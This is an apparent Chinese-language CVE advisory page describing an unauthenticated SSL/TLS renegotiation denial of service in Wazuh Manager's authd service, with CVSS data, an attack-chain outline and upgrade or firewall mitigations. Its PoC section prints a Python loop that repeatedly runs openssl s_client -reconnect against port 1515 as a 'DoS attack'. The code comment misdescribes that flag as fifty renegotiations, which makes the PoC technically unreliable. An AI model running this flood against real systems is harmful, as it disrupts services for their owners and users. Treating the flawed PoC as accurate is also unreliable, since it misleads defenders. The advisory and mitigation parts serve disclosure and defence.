CVE-2025-15615 CVSS 5.8 中危

CVE-2025-15615 Wazuh Manager拒绝服务漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-15615

漏洞类型

拒绝服务

CVSS评分

5.8 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Wazuh Manager

漏洞概述

Wazuh Manager authd服务4.7.3及之前版本存在SSL/TLS重协商限制不当漏洞。远程攻击者无需认证即可发送大量重协商请求，导致服务器CPU资源耗尽，造成拒绝服务。

技术细节

该漏洞源于Wazuh Manager的authd服务在处理SSL/TLS连接时，未正确限制客户端发起的重协商请求次数。攻击者可利用该漏洞，向目标服务发送恶意构造的握手数据包，强制服务端反复执行高计算成本的加密重协商操作。由于缺乏速率限制或资源配额，持续的攻击请求将迅速耗尽服务器的CPU资源，导致authd服务停止响应，进而引发拒绝服务。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别出开启且暴露在互联网上的Wazuh Manager authd服务端口（默认为1515端口）。

STEP 2

2. 漏洞利用

攻击者向目标端口发起连接，并利用SSL/TLS协议特性，发送大量恶意的重协商请求。

STEP 3

3. 资源耗尽

由于服务端未限制重协商次数，CPU资源被大量占用，导致无法处理正常请求，服务发生拒绝。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import subprocess
import time

# Target configuration
TARGET_HOST = "127.0.0.1"
TARGET_PORT = 1515

print(f"[*] Starting DoS attack against {TARGET_HOST}:{TARGET_PORT} via SSL Renegotiation...")

try:
    while True:
        # Using openssl s_client to trigger renegotiation
        # -reconnect: Perform SSL renegotiation 50 times
        cmd = f"openssl s_client -connect {TARGET_HOST}:{TARGET_PORT} -reconnect"
        
        # Execute command and suppress output
        subprocess.run(cmd, shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        
        print("[+] Sent renegotiation batch...")
        
except KeyboardInterrupt:
    print("\n[!] Attack stopped by user.")

影响范围

Wazuh Manager <= 4.7.3

防御指南

临时缓解措施

建议立即升级到修复了该漏洞的最新版本。如果暂时无法升级，应配置防火墙规则，阻断非受信任IP对Wazuh Manager authd服务端口（1515）的访问，以降低被攻击的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表